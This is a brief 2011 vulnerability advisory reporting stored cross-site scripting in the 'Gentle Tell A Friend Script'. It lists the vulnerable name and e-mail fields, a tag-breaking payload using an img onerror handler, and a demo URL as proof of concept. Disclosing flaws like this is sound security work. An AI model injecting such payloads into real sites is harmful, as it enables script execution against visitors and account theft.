# Exploit Title: Gentle Tell A Friend Script Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr

ISSUE

Cross Site Scripting can be done using the command input

Vulnerable Field:
First Name Field, Last Name Field, E-mail Adres Field and Friend's  
E-mail Adres Field.

Exploit:
"/></a></><img src=1.gif onerror=alert(1)>

POC:
http://tell-a-friend.gentleprojects.com/index.php


Thanks,



Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr